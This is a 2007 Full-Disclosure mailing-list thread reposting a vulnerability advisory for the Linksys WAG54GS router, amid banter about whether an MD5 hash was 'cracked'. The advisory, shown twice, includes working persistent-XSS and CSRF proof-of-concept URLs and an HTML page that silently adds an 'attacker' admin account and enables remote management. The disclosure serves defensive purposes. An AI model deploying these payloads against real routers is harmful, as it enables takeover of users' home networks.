-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Nice look up to http://unknown.pentester.googlepages.com/sitemap.xml
If you bothered that much you deserve the advisory I guess :-D. btw, I didn't know google pages have sitemap.xml enabled by default. So no hash cracking here, just to set things straight. Joey Mengele wrote: > After plugging this hash into John The Ripper, I was able to > reproduce the text of the original advisory. It follows in > entirety. For those wishing to verify the hash provided by the > architect, I have also included the advisory in attachment form as > a convenience for the skeptics who say MD5 can not be reversed. > > J > > ___ BEGIN LAME CRACKED ADVISORY ___ > Persistent XSS and CSRF and on Wireless-G ADSL Gateway with > SpeedBooster (WAG54GS) > > == Date found == > > 24 June 2007 > > == Firmware Version == > > V1.00.06 > > == Description == > > > There are several persistent XSS vulnerabilities on the > '/setup.cgi' script. > > It is possible to inject JavaScript by assigning a payload like the > following > to any of the vulnerable parameters: > >> <script>[PAYLOAD]</script> > > The vulnerable (non-sanitized) parameters are the following: > > 'devname' > 'snmp_getcomm' > 'snmp_setcomm' > 'c4_trap_ip_' > > Additionally, all HTTP requests are not tokenized using non- > predictable values. > Thus, all requests to the router's HTTP interface are vulnerable to > Cross-site > Request Forgeries (CSRF), perhaps by design. > > The following is an example of a HTTP request (notice the lack of > non-predictable tokens): > > POST /setup.cgi HTTP/1.1 > Authorization: Basic YWRtaW46YWRtaW4= > > mtenRestore=Restore+Factory+Defaults&todo=defaultsettings&this_file > =Factorydefaults.htm&next_file=index.htm&message= > > Although the original request is a POST, we can convert it to a > GET, so that all posted parameters can be submitted on a single URL. > > For example, the previous POST request can be converted to a URL > such as the following: > > http://admin:[EMAIL PROTECTED]/setup.cgi?mtenRestore=Restore+Factor > y+Defaults&todo=defaultsettings&this_file=Factorydefaults.htm&next_f > ile=index.htm&message= > > By forging administrative requests ("Administration" button on the > router's HTML menu), an attacker can compromise the router provided > the > victim user visits a malicious URL or HTML page. > > The attack can only be successfuly if any of the following > conditions are met: > > - the administrator hasn't changed the default credentials > (admin/admin) > - the administrator's browser has an active authentication session > with the router's interface when the attack happens > (highly unlikely) > > > == Persistent XSS PoC == > > The following URL creates a DoS condition by making the > "Administration" page inaccessible since 'history.back()' > will run everytime the Administration page is visited. Thus the > administrator won't be able to ever change the > default credentials unless a hard reset is performed on using the > router's physical "restart" switch: > > http://admin:[EMAIL PROTECTED]/setup.cgi?user_list=1&sysname=admin& > sysPasswd=admin&sysConfirmPasswd=admin&remote_management=enable&http > _wanport=8080&devname=&snmp_enable=disable&upnp_enable=enable&wlan_e > nable=enable&save=Save+Settings&h_user_list=1&h_pwset=yes&pwchanged= > yes&h_remote_management=enable&c4_trap_ip_="><script>history.back()< > /script>&h_snmp_enable=enable&h_upnp_enable=enable&h_wlan_enable=ena > ble&todo=save&this_file=Administration.htm&next_file=Administration. > htm&message= > http://tinyurl.com/36sjzw > > > == CSRF PoC == > > The following HTML page does the following: > > - adds an *additional* administrative account, with a username > equals to 'attacker' and a password equals to '0wned' (without > removing original admin account!) > - enables remote HTTP management over port 1337 > - sets other settings that are inrelevant to this discussion > > <html> > <body> > <script> > // send 2 requests to add an administrative account and enable > remote management > // tries with default credentials and with credentials cached by > browser (if any) > > var img = new Image(); > var img2 = new Image(); > > img.src = > 'http://admin:[EMAIL PROTECTED]/setup.cgi?user_list=8&sysname=attack > er&sysPasswd=0wned&sysConfirmPasswd=0wned&remote_management=enable&h > ttp_wanport=1337&devname=&snmp_enable=disable&upnp_enable=enable&wla > n_enable=enable&save=Save+Settings&h_user_list=8&h_pwset=yes&pwchang > ed=yes&h_remote_management=enable&c4_trap_ip_=&h_snmp_enable=disable > &h_upnp_enable=enable&h_wlan_enable=enable&todo=save&this_file=Admin > istration.htm&next_file=Administration.htm&message='; > img2.src = > 'http://192.168.1.1/setup.cgi?user_list=8&sysname=attacker&sysPasswd > =0wned&sysConfirmPasswd=0wned&remote_management=enable&http_wanport= > 1337&devname=&snmp_enable=disable&upnp_enable=enable&wlan_enable=ena > ble&save=Save+Settings&h_user_list=8&h_pwset=yes&pwchanged=yes&h_rem > ote_management=enable&c4_trap_ip_=&h_snmp_enable=disable&h_upnp_enab > le=enable&h_wlan_enable=enable&todo=save&this_file=Administration.ht > m&next_file=Administration.htm&message='; > </script> > </body> > </html> > > The first URL forges the administrative request using the default > credentials, so it won't work if default credentials > have been changed. > > The second URL doesn't specify any credentials as an attempt to use > the browser's cached credentials. > If the admin user has clicked on "Save password" on the basic > authentication prompt, most browsers will > prompt the user to confirm submitting the cached credentials. The > only situation in which browsers won't > ask the user to confirm submitting the credentials would be if the > malicious CSRF page was visited while > the browser has an active authenticated session with the router's > HTTP interface (very unlikely). > > > == Additional notes == > > - router reboots after saving settings (requests sent to > 'setup.cgi') > > - all attacks were tested using Internet Explorer 7 > > - No firmware updates were available at time of testing, only GPL > code is available: > > http://www.linksys.com/servlet/Satellite?c=L_CASupport_C2&childpagen > ame=US%2FLayout&cid=1166859889040&pagename=Linksys%2FCommon%2FVisito > rWrapper&lid=8904040638B02&displaypage=download#versiondetail > > > == References == > > http://www.linksys.com/ > > > == Credits == > > pagvac [ikwt.com] and Petko Petkov [gnucitizen.org] > ___ END LAME CRACKED ADVISORY ___ > > On Wed, 27 Jun 2007 16:29:43 -0400 pagvac > <[EMAIL PROTECTED]> wrote: >> The file "research.txt" will be provided once the vendor fixes the >> issues. At that point anyone can check that the hash matches the >> one >> included in this post. >> >> Thank you. >> >> Joey Mengele wrote: >>> Please provide the original content of research.txt so I can >> verify >>> that the hash is correct. I will also need the hash of your >>> md5sum.exe. Thanks. >>> >>> J >>> >>> On Wed, 27 Jun 2007 16:02:16 -0400 pagvac >>> <[EMAIL PROTECTED]> wrote: >>>> The HTTP interface of a network appliance has been researched >> and >>>> found to be vulnerable to several persistent XSS and CSRF. >>>> >>>> Such research was done by pdp (architect) and myself. We >> informed >>>> the >>>> vendor and will publish the details when a fix is available. >>>> >>>> The following is the MD5 hash for the advisory file. >>>> >>>> $ md5sum.exe research.txt >>>> 3db1d71fc3a0eae119617b3b1124206f *research.txt >>>> >>>> Regards, >>>> >>>> -- >>>> pagvac >>>> [http://gnucitizen.org, http://ikwt.com/] >>> -- >>> Click here for to find products that will help grow your small >> business. >> http://tagline.hushmail.com/fc/Ioyw6h4eDJc9UN71zvlsGp4ZGBzvqUZDr59L >> zooSm6N56gZuYA97Kt/ >>> >> >> -- >> pagvac >> [http://gnucitizen.org, http://ikwt.com/] > > -- > Click to make millions by owning your own franchise > http://tagline.hushmail.com/fc/Ioyw6h4eB8rDoXd3rzWGRyuLVrO8wOmiWFoFiDB4VYIwImlRd0K9S9/ > > ---------------------------------------------------------------------- > > Persistent XSS and CSRF and on Wireless-G ADSL Gateway with SpeedBooster (WAG54GS) > > == Date found == > > 24 June 2007 > > == Firmware Version == > > V1.00.06 > > == Description == > > > There are several persistent XSS vulnerabilities on the '/setup.cgi' script. > > It is possible to inject JavaScript by assigning a payload like the following > to any of the vulnerable parameters: > >> <script>[PAYLOAD]</script> > > The vulnerable (non-sanitized) parameters are the following: > > 'devname' > 'snmp_getcomm' > 'snmp_setcomm' > 'c4_trap_ip_' > > Additionally, all HTTP requests are not tokenized using non-predictable values. > Thus, all requests to the router's HTTP interface are vulnerable to Cross-site > Request Forgeries (CSRF), perhaps by design. > > The following is an example of a HTTP request (notice the lack of non-predictable tokens): > > POST /setup.cgi HTTP/1.1 > Authorization: Basic YWRtaW46YWRtaW4= > > mtenRestore=Restore+Factory+Defaults&todo=defaultsettings&this_file=Factorydefaults.htm&next_file=index.htm&message= > > Although the original request is a POST, we can convert it to a GET, so that all posted parameters can be submitted on a single URL. > > For example, the previous POST request can be converted to a URL such as the following: > > http://admin:[EMAIL PROTECTED]/setup.cgi?mtenRestore=Restore+Factory+Defaults&todo=defaultsettings&this_file=Factorydefaults.htm&next_file=index.htm&message= > > By forging administrative requests ("Administration" button on the router's HTML menu), an attacker can compromise the router provided the > victim user visits a malicious URL or HTML page. > > The attack can only be successfuly if any of the following conditions are met: > > - the administrator hasn't changed the default credentials (admin/admin) > - the administrator's browser has an active authentication session with the router's interface when the attack happens > (highly unlikely) > > > == Persistent XSS PoC == > > The following URL creates a DoS condition by making the "Administration" page inaccessible since 'history.back()' > will run everytime the Administration page is visited. Thus the administrator won't be able to ever change the > default credentials unless a hard reset is performed on using the router's physical "restart" switch: > > http://admin:[EMAIL PROTECTED]/setup.cgi?user_list=1&sysname=admin&sysPasswd=admin&sysConfirmPasswd=admin&remote_management=enable&http_wanport=8080&devname=&snmp_enable=disable&upnp_enable=enable&wlan_enable=enable&save=Save+Settings&h_user_list=1&h_pwset=yes&pwchanged=yes&h_remote_management=enable&c4_trap_ip_="><script>history.back()</script>&h_snmp_enable=enable&h_upnp_enable=enable&h_wlan_enable=enable&todo=save&this_file=Administration.htm&next_file=Administration.htm&message= > http://tinyurl.com/36sjzw > > > == CSRF PoC == > > The following HTML page does the following: > > - adds an *additional* administrative account, with a username equals to 'attacker' and a password equals to '0wned' (without removing original admin account!) > - enables remote HTTP management over port 1337 > - sets other settings that are inrelevant to this discussion > > <html> > <body> > <script> > // send 2 requests to add an administrative account and enable remote management > // tries with default credentials and with credentials cached by browser (if any) > > var img = new Image(); > var img2 = new Image(); > > img.src = 'http://admin:[EMAIL PROTECTED]/setup.cgi?user_list=8&sysname=attacker&sysPasswd=0wned&sysConfirmPasswd=0wned&remote_management=enable&http_wanport=1337&devname=&snmp_enable=disable&upnp_enable=enable&wlan_enable=enable&save=Save+Settings&h_user_list=8&h_pwset=yes&pwchanged=yes&h_remote_management=enable&c4_trap_ip_=&h_snmp_enable=disable&h_upnp_enable=enable&h_wlan_enable=enable&todo=save&this_file=Administration.htm&next_file=Administration.htm&message='; > img2.src = 'http://192.168.1.1/setup.cgi?user_list=8&sysname=attacker&sysPasswd=0wned&sysConfirmPasswd=0wned&remote_management=enable&http_wanport=1337&devname=&snmp_enable=disable&upnp_enable=enable&wlan_enable=enable&save=Save+Settings&h_user_list=8&h_pwset=yes&pwchanged=yes&h_remote_management=enable&c4_trap_ip_=&h_snmp_enable=disable&h_upnp_enable=enable&h_wlan_enable=enable&todo=save&this_file=Administration.htm&next_file=Administration.htm&message='; > </script> > </body> > </html> > > The first URL forges the administrative request using the default credentials, so it won't work if default credentials > have been changed. > > The second URL doesn't specify any credentials as an attempt to use the browser's cached credentials. > If the admin user has clicked on "Save password" on the basic authentication prompt, most browsers will > prompt the user to confirm submitting the cached credentials. The only situation in which browsers won't > ask the user to confirm submitting the credentials would be if the malicious CSRF page was visited while > the browser has an active authenticated session with the router's HTTP interface (very unlikely). > > > == Additional notes == > > - router reboots after saving settings (requests sent to 'setup.cgi') > > - all attacks were tested using Internet Explorer 7 > > - No firmware updates were available at time of testing, only GPL code is available: > > http://www.linksys.com/servlet/Satellite?c=L_CASupport_C2&childpagename=US%2FLayout&cid=1166859889040&pagename=Linksys%2FCommon%2FVisitorWrapper&lid=8904040638B02&displaypage=download#versiondetail > > > == References == > > http://www.linksys.com/ > > > == Credits == > > pagvac [ikwt.com] and Petko Petkov [gnucitizen.org] - -- pagvac [http://gnucitizen.org, http://ikwt.com/] -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2.2 (MingW32) iD8DBQFGgtbPjXB4hX6OC/cRArrUAKDkUFbzryfw8LGwyLUNbfvUcIoNFACfWkwL OnK4S+u6zm9vPt1QHmeI2S4= =qF6t -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/